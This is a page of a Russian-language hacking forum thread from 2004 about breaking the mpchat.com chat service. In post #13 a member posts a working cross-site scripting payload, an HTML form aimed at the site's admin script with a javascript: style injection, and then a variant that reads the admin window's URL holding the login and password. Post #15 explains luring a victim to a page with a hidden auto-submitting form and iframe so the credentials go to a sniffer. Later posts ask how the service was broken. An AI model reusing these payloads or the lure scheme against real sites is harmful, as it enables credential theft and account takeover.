ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Mpchat.com
   
Ответ
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.07.2004, 07:49
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
я нашел xss в одной из страниц этого портала

этот баг позволяет собрать страницу, которая (после открытия ее жертвой) уводит логин и пароль админа (если была открыта админка) или уводит логин и идентификатор пользователя в чате

если кому интересно могу дать сорцы =)
 
Ответить с цитированием

  #12  
Старый 12.07.2004, 18:48
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Где там xss ?
 
Ответить с цитированием

  #13  
Старый 12.07.2004, 21:11
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>

если зайти в админку
и открыть страницу с выше указаным кодом
потом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>
и послать форму

то в новом окне откроется страница c xss иньекцией, которая обратится в окно с именем administration (а именно в нем и открывается админка) и покажет url (а в нем логин и пароль)
 
Ответить с цитированием

  #14  
Старый 12.07.2004, 21:34
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Подожди .. Эти действия нельзя произвести без прав администратора ... Или я что-то не вдогнал ...
 
Ответить с цитированием

  #15  
Старый 12.07.2004, 21:50
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
некто вася зарегил свой чат открыл окно админки

некто петя просит посетить его сайт
(к сожелению xss пасивный, т.е. необходимо заманить пользователя)

на сайте пети есть невидимая форма с на подобие моего примера, которая автоматический отправляется в скрытый iframe

в результате его логин и пароль уходят, к примеру на снифер
 
Ответить с цитированием

  #16  
Старый 13.07.2004, 00:05
Anton2
Новичок
Регистрация: 05.07.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
Exclamation
Ну вы ребят даёте, такие сложные комбинации чтобы взломать пароль администратора, необходимо заманить его на этот код, помоему так хоть что можно взломать зная структуру, а пароль он всеравно себе вернёт, можно конечно попробовать и только немного напакостить
 
Ответить с цитированием

  #17  
Старый 16.07.2004, 14:21
FoudeN
Новичок
Регистрация: 16.07.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Народ, а с чего нужно начинать чтобы кумекать с вами на ровне? (т-е хаком)
 
Ответить с цитированием

  #18  
Старый 16.07.2004, 14:42
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Не думаю я, чтомы говорим о чем-то сверхсложном ...

Все приходит со временем ...
 
Ответить с цитированием

  #19  
Старый 08.08.2004, 11:43
Anton2
Новичок
Регистрация: 05.07.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию
Эт сново я,
похоже всёже ктоко круто поломал мпчата, но так и неизвестно кто.
По форуму сервиса видно что сам антиадмин.ру заходил и поломал там пару чатов различным способами.

Но вроде и ещё ктото приходил и уложил весь сервак на 2 недели в сон
Вообщем щас там востановительные работы.
Короче кто что знает по этому поводу напишите как ломается &nbsp;
 
Ответить с цитированием

  #20  
Старый 08.08.2004, 11:44
Anton2
Новичок
Регистрация: 05.07.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию
Т.е. не антиадмин, а админ античат.ру
 
Ответить с цитированием
Ответ
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ